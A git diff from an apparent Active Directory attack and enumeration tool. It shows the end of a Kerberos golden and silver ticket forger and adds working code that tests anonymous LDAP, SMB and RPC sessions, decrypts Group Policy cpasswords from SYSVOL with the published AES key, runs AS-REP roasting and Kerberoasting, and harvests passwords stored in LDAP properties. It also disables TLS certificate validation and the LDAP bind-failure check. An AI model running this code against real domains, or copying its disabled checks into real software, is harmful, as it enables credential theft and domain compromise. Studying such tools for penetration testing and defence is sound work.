kdcRep['enc-part'] part + # with a key we chose. It actually doesn't really matter since nobody uses it (could it be trash?) + encodedEncASRepPart = encoder.encode(encASorTGSRepPart) + + if self.__domain == self.__server: + # Key Usage 3 + # AS-REP encrypted part (includes TGS session key or + # application session key), encrypted with the client key + # (Section 5.4.2) + sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets()) + logging.info('\tEncASRepPart') + cipherText = cipher.encrypt(sessionKey, 3, encodedEncASRepPart, None) + else: + # Key Usage 8 + # TGS-REP encrypted part (includes application session + # key), encrypted with the TGS session key + # (Section 5.4.2) + sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets()) + logging.info('\tEncTGSRepPart') + cipherText = cipher.encrypt(sessionKey, 8, encodedEncASRepPart, None) + + kdcRep['enc-part']['cipher'] = cipherText + kdcRep['enc-part']['etype'] = cipher.enctype + kdcRep['enc-part']['kvno'] = 1 + + if logging.getLogger().level == logging.DEBUG: + logging.debug('Final Golden Ticket') + print(kdcRep.prettyPrint()) + print ('\n') + + return encoder.encode(kdcRep), cipher, sessionKey + + def saveTicket(self, ticket, sessionKey): + logging.info('Saving ticket in %s' % (self.__target.replace('/', '.') + '.ccache')) + from impacket.krb5.ccache import CCache + ccache = CCache() + + if self.__server == self.__domain: + ccache.fromTGT(ticket, sessionKey, sessionKey) + else: + ccache.fromTGS(ticket, sessionKey, sessionKey) + ccache.saveFile(self.__target.replace('/','.') + '.ccache') + + def run(self): + ticket, adIfRelevant = self.createBasicTicket() + if ticket is not None: + encASorTGSRepPart, encTicketPart, pacInfos = self.customizeTicket(ticket, adIfRelevant) + ticket, cipher, sessionKey = self.signEncryptTicket(ticket, encASorTGSRepPart, encTicketPart, pacInfos) + self.saveTicket(ticket, sessionKey) + return True + return False + +if __name__ == '__main__': + print(version.BANNER) + + parser = argparse.ArgumentParser(add_help=True, description="Creates a Kerberos golden/silver tickets based on " + "user options") + parser.add_argument('target', action='store', help='username for the newly created ticket') + parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the silver ticket will' + ' be generated for. if omitted, golden ticket will be created') + parser.add_argument('-request', action='store_true', default=False, help='Requests ticket to domain and clones it ' + 'changing only the supplied information. It requires specifying -user') + parser.add_argument('-domain', action='store', required=True, help='the fully qualified domain name (e.g. contoso.com)') + parser.add_argument('-domain-sid', action='store', required=True, help='Domain SID of the target domain the ticker will be ' + 'generated for') + parser.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key used for signing the ticket ' + '(128 or 256 bits)') + parser.add_argument('-nthash', action="store", help='NT hash used for signing the ticket') + parser.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file (silver ticket only)') + parser.add_argument('-groups', action="store", default = '513, 512, 520, 518, 519', help='comma separated list of ' + 'groups user will belong to (default = 513, 512, 520, 518, 519)') + parser.add_argument('-user-id', action="store", default = '500', help='user id for the user the ticket will be ' + 'created for (default = 500)') + parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC') + parser.add_argument('-duration', action="store", default = '3650', help='Amount of days till the ticket expires ' + '(default = 365*10)') + parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') + parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') + + group = parser.add_argument_group('authentication') + + group.add_argument('-user', action="store", help='domain/username to be used if -request is chosen (it can be ' + 'different from domain/username') + group.add_argument('-password', action="store", help='password for domain/username') + group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') + group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ' + 'ommited it use the domain part (FQDN) specified in the target parameter') + + if len(sys.argv)==1: + parser.print_help() + print("\nExamples: ") + print("\t./ticketer.py -nthash -domain-sid -domain baduser\n") + print("\twill create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4.") + print("\tIf you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256") + print("\t(depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as") + print("\tbaduser.ccache.\n") + print("\t./ticketer.py -nthash -aesKey -domain-sid -domain " + " -request -user -password baduser\n") + print("\twill first authenticate against the KDC (using -user/-password) and get a TGT that will be used") + print("\tas template for customization. Whatever encryption algorithms used on that ticket will be honored,") + print("\thence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser'") + print("\tand saved as baduser.ccache") + sys.exit(1) + + options = parser.parse_args() + + # Init the example's logger theme + logger.init(options.ts) + + if options.debug is True: + logging.getLogger().setLevel(logging.DEBUG) + # Print the Library's installation path + logging.debug(version.getInstallationPath()) + else: + logging.getLogger().setLevel(logging.INFO) + + if options.domain is None: + logging.critical('Domain should be specified!') + sys.exit(1) + + if options.aesKey is None and options.nthash is None and options.keytab is None: + logging.error('You have to specify either aesKey, or nthash, or keytab') + sys.exit(1) + + if options.aesKey is not None and options.nthash is not None and options.request is False: + logging.error('You cannot specify both -aesKey and -nthash w/o using -request. Pick only one') + sys.exit(1) + + if options.request is True and options.user is None: + logging.error('-request parameter needs -user to be specified') + sys.exit(1) + + if options.request is True and options.hashes is None and options.password is None: + from getpass import getpass + password = getpass("Password:") + else: + password = options.password + + try: + executer = TICKETER(options.target, password, options.domain, options) + executer.run() + except Exception as e: + if logging.getLogger().level == logging.DEBUG: + import traceback + traceback.print_exc() + print(str(e)) diff --git a/ade/connectors/connectors.py b/ade/connectors/connectors.py index 0099a3c..4b3c998 100644 --- a/ade/connectors/connectors.py +++ b/ade/connectors/connectors.py @@ -1,4 +1,5 @@ # LDAP connection +import ssl import ldap3 from ldap3.core.exceptions import LDAPBindError # SMB connection @@ -28,13 +29,15 @@ def ldap_connector(self, server: str, ldaps: bool, domuser: str, passwd: str, le ''' if ldaps: - dc_conn = ldap3.Server(server, port=636, use_ssl=True, get_info=level) + dc_conn = ldap3.Server(server, port=636, use_ssl=True, get_info=level, tls=ldap3.Tls(validate=ssl.CERT_NONE)) conn = ldap3.Connection(dc_conn, user=domuser, password=passwd) conn.bind() + print(conn) conn.start_tls() # Validate the login (bind) request - if int(conn.result['result']) != 0: - raise LDAPBindError + #if int(conn.result['result']) != 0: + + #raise LDAPBindError else: dc_conn = ldap3.Server(server, get_info=level) conn = ldap3.Connection(dc_conn, user=domuser, password=passwd) diff --git a/ade/modEnumerator/modEnumerator.py b/ade/modEnumerator/modEnumerator.py index e115281..f31c625 100644 --- a/ade/modEnumerator/modEnumerator.py +++ b/ade/modEnumerator/modEnumerator.py @@ -2,14 +2,25 @@ import json import ldap3 -from ldap3.core.exceptions import LDAPBindError +import re +import base64 +import os +import socket +import concurrent.futures +from ldap3.core.exceptions import LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError +from impacket.dcerpc.v5 import epm +from impacket.smbconnection import SessionError +from impacket.nmb import NetBIOSTimeout, NetBIOSError +from termcolor import colored +from Cryptodome.Cipher import AES from . .connectors.connectors import Connectors +from . .utils.utils import Utils class ModEnumerator(): def __init__(self): - pass + self.utils = Utils() def enumerate_server_names(self, computerobjects: ldap3.Entry) -> dict: @@ -96,4 +107,285 @@ def enumerate_for_cleartext_passwords(self, peopleobjects: ldap3.Entry, server: # We had a valid login passwords[user['attributes']['name'][0]] = user['attributes'].get('userPassword') - return passwords \ No newline at end of file + return passwords + + + def enumNULLSessions(self, server: str, connector: Connectors): + # Test for anonymous binds to ldap + try: + ldap = connector.ldap_connector(server, False, '', '') + print('[ ' + colored('WARN', 'yellow') +' ] Anonymous LDAP bind allowed') + except LDAPBindError: + print('[ ' + colored('INFO', 'green') +' ] Anonymous LDAP bind not allowed') + ldap.unbind() + + # Test for null-session/anonymous session on smb + smb = connector.smb_connector(server, '', '') + if smb: + # It is not False and as such, we got a connection back + print('[ ' + colored('WARN', 'yellow') + f' ] Anonymous/NULL SMB connection allowed got ServerOS: {smb.getServerOS()} and HostName: {str(smb.getServerName())}') + else: + print('[ ' + colored('INFO', 'green') +' ] Anonymous/NULL SMB connection not allowed') + smb.logoff() + + # Test for null-session/anonymous session on rpc + rpc = connector.rpc_connector(server, '', '') + resp = rpc.bind(epm.MSRPC_UUID_PORTMAP) + # TODO: Validate by negative test + if resp.getData(): + print('[ ' + colored('WARN', 'yellow') + f' ] Anonymous/NULL RPC connection allowed got following bytes: {resp.getData()} from the connection') + else: + print('[ ' + colored('INFO', 'green') +' ] Anonymous/NULL RPC connection not allowed') + + + def enumSYSVOL(self, server: str, connector: Connectors, domuser: str, passwd: str) -> dict: + print('[ .. ] Searching SYSVOL for cpasswords\r') + cpasswords = {} + try: + smbconn = connector.smb_connector(server, domuser, passwd) + dirs = smbconn.listShares() + for share in dirs: + if str(share['shi1_netname']).rstrip('\0').lower() == 'sysvol': + path = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') + paths = [e.get_shortname() for e in path if len(e.get_shortname()) > 2] + for dirname in paths: + try: + # Dont want . or .. + subPath = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), str(dirname) + '\\*') + for sub in subPath: + if len(sub.get_shortname()) > 2: + paths.append(dirname + '\\' + sub.get_shortname()) + except (SessionError, UnicodeEncodeError, NetBIOSError) as e: + continue + + # Compile regexes for username and passwords + cpassRE = re.compile(r'cpassword=\"([a-zA-Z0-9/]+)\"') + unameRE = re.compile(r'userName|runAs=\"([ a-zA-Z0-9/\(\)-]+)\"') + + # Prepare the ciphers based on MSDN article with key and IV + cipher = AES.new(bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'), AES.MODE_CBC, bytes.fromhex('00' * 16)) + + # Since the first entry is the DC we dont want that + for item in paths[1:]: + if '.xml' in item.split('\\')[-1]: + with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'wb') as f: + smbconn.getFile(str(share['shi1_netname']).rstrip('\0'), item, f.write) + with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'r') as f: + try: + fileContent = f.read() + passwdMatch = cpassRE.findall(str(fileContent)) + for passwd in passwdMatch: + unameMatch = unameRE.findall(str(fileContent)) + for usr in unameMatch: + padding = '=' * (4 - len(passwd) % 4) + # For some reason, trailing nul bytes were on each character, so we remove any if they are there + cpasswords[usr] = cipher.decrypt(base64.b64decode(bytes(passwd + padding, 'utf-8'))).strip().decode('utf-8').replace('\x00', '') + except (UnicodeDecodeError, AttributeError) as e: + # Remove the files we had to write during the search + os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) + continue + + # Remove the files we had to write during the search + os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) + + except (SessionError, UnicodeEncodeError, NetBIOSError): + print('[ ' + colored('ERROR', 'red') + ' ] Some error occoured while searching SYSVOL') + else: + smbconn.close() + return cpasswords + + + def enumSMB(self, connector: Connectors, smbShareCandidates: list, server: str, domuser: str, passwd: str) -> dict: + self.connector = connector + self.server = server + self.domuser = domuser + self.passwd = passwd + smbBrowseable = {} + try: + with concurrent.futures.ThreadPoolExecutor(max_workers=len(smbShareCandidates)) as executor: + worker = executor.map(self.enumShare, [share for share in smbShareCandidates]) + for result in worker: + smbBrowseable = { **smbBrowseable, **result } + except ValueError: + pass + return smbBrowseable + + + def enumShare(self, dnsname): + smbBrowseable = {} + try: + # Changing default timeout as shares should respond withing 5 seconds if there is a share + # and ACLs make it available to self.user with self.passwd + smbconn = self.connector.smb_connector(self.server, self.domuser, self.passwd) + dirs = smbconn.listShares() + smbBrowseable[str(dnsname)] = {} + for share in dirs: + smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = '' + try: + _ = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') + smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = True + except (SessionError, UnicodeEncodeError, NetBIOSError): + # Didnt have permission, all good + # Im second guessing the below adding to the JSON file as we're only interested in the listable directories really + #self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = False + continue + smbconn.logoff() + except (socket.error, NetBIOSTimeout, SessionError, NetBIOSError): + # TODO: Examine why we sometimes get: + # impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE + # on healthy shares. It seems to be reported with CIF shares + return smbBrowseable + return smbBrowseable + + + def enumASREPRoast(self, conn: ldap3.Connection, server: str, dc_string) -> list: + from . .attacks.asreproast import asreproast + roaster = asreproast.AsRepRoast() + # Build user array + users = [] + conn.search(dc_string, '(&(samaccounttype=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))', attributes='*', search_scope=ldap3.SUBTREE) + for entry in conn.entries: + users.append(str(entry['sAMAccountName']) + '@{0}'.format(server)) + if len(users) == 0: + print('[ ' + colored('OK', 'green') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) + elif len(users) == 1: + print('[ ' + colored('OK', 'yellow') +' ] Found {0} account that does not require Kerberos preauthentication'.format(len(users))) + else: + print('[ ' + colored('OK', 'yellow') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) + + hashes = [] + # Build request for Tickets + for usr in users: + userHash = roaster.RepRoast(server, usr) + if userHash: + hashes = hashes + userHash + + return hashes + + + def enumKerberoast(self, spn: list, domuser: str, passwd: str) -> dict: + from . .attacks.kerberoast import kerberoast + kerberoaster = kerberoast.Kerberoast() + + users_spn = {} + user_tickets = {} + + userDomain = domuser.split('@')[1] + + idx = 0 + for _ in spn: + spns = json.loads(spn[idx].entry_to_json()) + users_spn[self.utils.splitJsonArr(spns['attributes'].get('name'))] = self.utils.splitJsonArr(spns['attributes'].get('servicePrincipalName')) + idx += 1 + for user, spn in users_spn.items(): + if isinstance(spn, list): + # We only really need one to get a ticket + spn = spn[0] + else: + tickets = kerberoaster.roast(domuser, passwd, userDomain, user, spn) + if tickets: + user_tickets = { **user_tickets, **tickets } + + return user_tickets + + + def enumForCreds(self, CREDS: bool, passwords: dict, ldapdump: list, connector: Connectors, server: str) -> bool: + searchTerms = [ + 'legacy', 'pass', 'password', 'pwd', 'passcode' + ] + excludeTerms = [ + 'badPasswordTime', 'badPwdCount', 'pwdLastSet', 'legacyExchangeDN' + ] + possiblePass = {} + idx = 0 + for _ in ldapdump: + user = json.loads(ldapdump[idx].entry_to_json()) + for prop, value in user['attributes'].items(): + if any(term in prop.lower() for term in searchTerms) and not any(ex in prop for ex in excludeTerms): + try: + possiblePass[user['attributes']['userPrincipalName'][0]] = value[0] + except KeyError: + # Could be a service user instead + try: + possiblePass[user['attributes']['servicePrincipalName'][0]] = value[0] + except KeyError: + # Don't know which type + continue + + idx += 1 + if len(possiblePass) > 0: + print('[ ' + colored('INFO', 'green') +' ] Found possible password in properties - attempting to determine if it is a password') + + for user, password in possiblePass.items(): + try: + usr, passwd = self.entroPass(user, password, server, CREDS, connector) + except TypeError: + # None returned, just continue + continue + if not CREDS: + domuser = usr + passwd = passwd + passwords[domuser] = passwd + return True, passwords + return False, passwords + + + def entroPass(self, user: str, password: str, server: str, CREDS: bool, connector: Connectors): + test_conn = None + if not password: + return None + # First check if it is a clear text + try: + test_conn = connector.ldap_connector(server, True, user, password) + except (LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError): + try: + test_conn = connector.ldap_connector(server, False, user, password) + except (LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError): + pass + if test_conn: + # Validate the login (bind) request + if int(test_conn.result['result']) != 0: + if CREDS: + print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible clear text password'.format(user, password)) + else: + print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not cleartext'.format(user, password)) + else: + if CREDS: + print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property'.format(user, password)) + else: + print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property - continuing with these creds'.format(user, password)) + print('') + return user, password + test_conn.unbind() + test_conn = None + + # Attempt for base64 + # Could be base64, lets try + try: + pw = base64.b64decode(bytes(password, encoding='utf-8')).decode('utf-8') + except base64.binascii.Error: + return None + + # Attempt decoded PW + try: + test_conn = connector.ldap_connector(server, True, user, pw) + except (LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError): + try: + test_conn = connector.ldap_connector(server, False, user, pw) + except (LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError): + pass + if test_conn: + # Validate the login (bind) request + if int(test_conn.result['result']) != 0: + test_conn.unbind() + if CREDS: + print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible base64 decoded password'.format(user, pw)) + else: + print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not base64 encoded'.format(user, pw)) + else: + if CREDS: + print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property'.format(user, pw)) + else: + print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw)) + print('') + return user, pw \ No newline at end of file diff --git a/ade/utils/__init__.py b/ade/utils/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/ade/utils/utils.py b/ade/utils/utils.py new file mode 100644 index 0000000..54447da --- /dev/null +++ b/ade/utils/utils.py @@ -0,0 +1,33 @@ +import json +from termcolor import colored + + +class Utils(): + + + def __init__(self): + pass + + + def WriteFiles(self, output: str, content, name: str): + with open(str(output) + f'-{name}', 'w') as f: + if isinstance(content, list): + for item in content: + f.write(str(item)) + f.write('\n') + elif isinstance(content, dict): + if 'json' in name: + json.dump(content, f, indent=4, sort_keys=False) + else: + for key, value in content: + f.write(f'{key}:{value}') + f.write('\n') + + print('[ ' + colored('OK', 'green') + f' ] Wrote {name}') + + + def splitJsonArr(self, arr): + if isinstance(arr, list): + if len(arr) == 1: + return arr[0] + return arr \ No newline at end of file diff --git a/external/LICENSE b/external/LICENSE deleted file mode 100755 index 9fa07de..0000000 --- a/external/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2018 Fox-IT - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. diff --git a/external/bloodhound/__init__.py b/external/bloodhound/__init__.py deleted file mode 100755 index 6a45b30..0000000 --- a/external/bloodhound/__init__.py +++ /dev/null @@ -1,291 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import os, sys, logging, argparse, getpass, time, re -from .ad.domain import AD, ADDC -from .ad.authentication import ADAuthentication -from .enumeration.computers import ComputerEnumerator -from .enumeration.memberships import MembershipEnumerator -from .enumeration.domains import DomainEnumerator - -""" -BloodHound.py is a Python port of BloodHound, designed to run on Linux and Windows. -""" -class BloodHound(object): - def __init__(self, ad): - self.ad = ad - self.ldap = None - self.pdc = None - self.sessions = [] - - - def connect(self): - if len(self.ad.dcs()) == 0: - logging.error('Could not find a domain controller. Consider specifying a domain and/or DNS server.') - - if not self.ad.baseDN: - logging.error('Could not figure out the domain to query. Please specify this manualy with -d') - - pdc = self.ad.dcs()[0] - logging.debug('Using LDAP server: %s', pdc) - logging.debug('Using base DN: %s', self.ad.baseDN) - - if len(self.ad.kdcs()) > 0: - kdc = self.ad.kdcs()[0] - logging.debug('Using kerberos KDC: %s', kdc) - logging.debug('Using kerberos realm: %s', self.ad.realm()) - - # Create a domain controller object - self.pdc = ADDC(pdc, self.ad) - # Create an object resolver - self.ad.create_objectresolver(self.pdc) -# self.pdc.ldap_connect(self.ad.auth.username, self.ad.auth.password, kdc) - - - def run(self, collect, num_workers=10, disable_pooling=False): - start_time = time.time() - if 'group' in collect or 'objectprops' in collect or 'acl' in collect: - # Fetch domains/computers for later - self.pdc.prefetch_info('objectprops' in collect, 'acl' in collect) - # Initialize enumerator - membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling) - membership_enum.enumerate_memberships() - elif any(method in collect for method in ['localadmin', 'session', 'loggedon', 'experimental', 'rdp', 'dcom', 'psremote']): - # We need to know which computers to query regardless - # We also need the domains to have a mapping from NETBIOS -> FQDN for local admins - self.pdc.prefetch_info('objectprops' in collect, 'acl' in collect) - elif 'trusts' in collect: - # Prefetch domains - self.pdc.get_domains('acl' in collect) - if 'trusts' in collect or 'acl' in collect or 'objectprops' in collect: - trusts_enum = DomainEnumerator(self.ad, self.pdc) - trusts_enum.dump_domain(collect) - if 'localadmin' in collect or 'session' in collect or 'loggedon' in collect or 'experimental' in collect: - # If we don't have a GC server, don't use it for deconflictation - have_gc = len(self.ad.gcs()) > 0 - computer_enum = ComputerEnumerator(self.ad, self.pdc, collect, do_gc_lookup=have_gc) - computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers) - end_time = time.time() - minutes, seconds = divmod(int(end_time-start_time),60) - logging.info('Done in %02dM %02dS' % (minutes, seconds)) - - -def kerberize(): - # If the kerberos credential cache is known, use that. - krb5cc = os.getenv('KRB5CCNAME') - - # Otherwise, guess it. - if krb5cc is None: - krb5cc = '/tmp/krb5cc_%u' % os.getuid() - - if os.path.isfile(krb5cc): - logging.debug('Using kerberos credential cache: %s', krb5cc) - if os.getenv('KRB5CCNAME') is None: - os.environ['KRB5CCNAME'] = krb5cc - else: - logging.error('Could not find kerberos credential cache file') - sys.exit(1) - -def resolve_collection_methods(methods): - """ - Convert methods (string) to list of validated methods to resolve - """ - valid_methods = ['group', 'localadmin', 'session', 'trusts', 'default', 'all', 'loggedon', - 'objectprops', 'experimental', 'acl', 'dcom', 'rdp', 'psremote', 'dconly'] - default_methods = ['group', 'localadmin', 'session', 'trusts'] - # Similar to SharpHound, All is not really all, it excludes loggedon - all_methods = ['group', 'localadmin', 'session', 'trusts', 'objectprops', 'acl', 'dcom', 'rdp', 'psremote'] - # DC only, does not collect to computers - dconly_methods = ['group', 'trusts', 'objectprops', 'acl'] - if ',' in methods: - method_list = [method.lower() for method in methods.split(',')] - validated_methods = [] - for method in method_list: - if method not in valid_methods: - logging.error('Invalid collection method specified: %s', method) - return False - - if method == 'default': - validated_methods += default_methods - elif method == 'all': - validated_methods += all_methods - elif method == 'dconly': - validated_methods += dconly_methods - else: - validated_methods.append(method) - return set(validated_methods) - else: - validated_methods = [] - # It is only one - method = methods.lower() - if method in valid_methods: - if method == 'default': - validated_methods += default_methods - elif method == 'all': - validated_methods += all_methods - elif method == 'dconly': - validated_methods += dconly_methods - else: - validated_methods.append(method) - return set(validated_methods) - else: - logging.error('Invalid collection method specified: %s', method) - return False - -def main(): -# 2020-03-10: Commented out all below logging definition that wasnt already - #logging.basicConfig(stream=sys.stderr, level=logging.INFO) - logging.basicConfig(stream=os.devnull, level=logging.INFO) - - logger = logging.getLogger() - logger.setLevel(logging.INFO) - #stream = logging.StreamHandler(sys.stderr) - stream = logging.StreamHandler(os.devnull) - stream.setLevel(logging.DEBUG) - formatter = logging.Formatter('%(levelname)s: %(message)s') - formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s') - stream.setFormatter(formatter) - logger.addHandler(stream) - - parser = argparse.ArgumentParser(add_help=True, description='Python based ingestor for BloodHound\nFor help or reporting issues, visit https://github.com/Fox-IT/BloodHound.py', formatter_class=argparse.RawDescriptionHelpFormatter) - - parser.add_argument('-c', - '--collectionmethod', - action='store', - default='Default', - help='Which information to collect. Supported: Group, LocalAdmin, Session, ' - 'Trusts, Default (all previous), DCOnly (no computer connections), DCOM, RDP,' - 'PSRemote, LoggedOn, ObjectProps, ACL, All (all except LoggedOn). ' - 'You can specify more than one by separating them with a comma. (default: Default)') - parser.add_argument('-u', - '--username', - action='store', - help='Username. Format: username[@domain]; If the domain is unspecified, the current domain is used.') - parser.add_argument('-p', - '--password', - action='store', - help='Password') - parser.add_argument('-k', - '--kerberos', - action='store_true', - help='Use kerberos') - parser.add_argument('--hashes', - action='store', - help='LM:NLTM hashes') - parser.add_argument('-ns', - '--nameserver', - action='store', - help='Alternative name server to use for queries') - parser.add_argument('--dns-tcp', - action='store_true', - help='Use TCP instead of UDP for DNS queries') - parser.add_argument('-d', - '--domain', - action='store', - help='Domain to query.') - parser.add_argument('-dc', - '--domain-controller', - metavar='HOST', - action='store', - help='Override which DC to query (hostname)') - parser.add_argument('-gc', - '--global-catalog', - metavar='HOST', - action='store', - help='Override which GC to query (hostname)') - parser.add_argument('-w', - '--workers', - action='store', - type=int, - default=10, - help='Number of workers for computer enumeration (default: 10)') - parser.add_argument('-v', - action='store_true', - help='Enable verbose output') - parser.add_argument('--disable-pooling', - action='store_true', - help='Don\'t use subprocesses for ACL parsing (only for debugging purposes)') - - args = parser.parse_args() - - if args.v is True: - logger.setLevel(logging.DEBUG) - - if args.kerberos is True: - logging.debug('Authentication: kerberos') - kerberize() - auth = ADAuthentication() - elif args.username is not None and args.password is not None: - logging.debug('Authentication: username/password') - auth = ADAuthentication(username=args.username, password=args.password, domain=args.domain) - elif args.username is not None and args.password is None and args.hashes is None: - args.password = getpass.getpass() - auth = ADAuthentication(username=args.username, password=args.password, domain=args.domain) - elif args.username is None and (args.password is not None or args.hashes is not None): - logging.error('Authentication: password or hashes provided without username') - sys.exit(1) - elif args.hashes is not None and args.username is not None: - logging.debug('Authentication: NTLM hashes') - lm, nt = args.hashes.split(":") - auth = ADAuthentication(lm_hash=lm, nt_hash=nt, username=args.username, domain=args.domain) - else: - parser.print_help() - sys.exit(1) - - ad = AD(auth=auth, domain=args.domain, nameserver=args.nameserver, dns_tcp=args.dns_tcp) - - # Resolve collection methods - collect = resolve_collection_methods(args.collectionmethod) - if not collect: - return - logging.debug('Resolved collection methods: %s', ', '.join(list(collect))) - - logging.debug('Using DNS to retrieve domain information') - ad.dns_resolve(kerberos=args.kerberos, domain=args.domain, options=args) - - # Override the detected DC / GC if specified - if args.domain_controller: - if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', args.domain_controller): - logging.error('The specified domain controller %s looks like an IP address, but requires a hostname (FQDN).\n'\ - 'Use the -ns flag to specify a DNS server IP if the hostname does not resolve on your default nameserver.', - args.domain_controller) - sys.exit(1) - ad.override_dc(args.domain_controller) - if args.global_catalog: - if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', args.global_catalog): - logging.error('The specified global catalog server %s looks like an IP address, but requires a hostname (FQDN).\n'\ - 'Use the -ns flag to specify a DNS server IP if the hostname does not resolve on your default nameserver.', - args.global_catalog) - sys.exit(1) - ad.override_gc(args.global_catalog) - - bloodhound = BloodHound(ad) - bloodhound.connect() - bloodhound.run(collect=collect, - num_workers=args.workers, - disable_pooling=args.disable_pooling) - - -if __name__ == '__main__': - main() diff --git a/external/bloodhound/__main__.py b/external/bloodhound/__main__.py deleted file mode 100755 index a9e7cde..0000000 --- a/external/bloodhound/__main__.py +++ /dev/null @@ -1,5 +0,0 @@ -#! /usr/bin/env python - -import bloodhound - -bloodhound.main() diff --git a/external/bloodhound/ad/__init__.py b/external/bloodhound/ad/__init__.py deleted file mode 100755 index 94d6578..0000000 --- a/external/bloodhound/ad/__init__.py +++ /dev/null @@ -1,23 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR 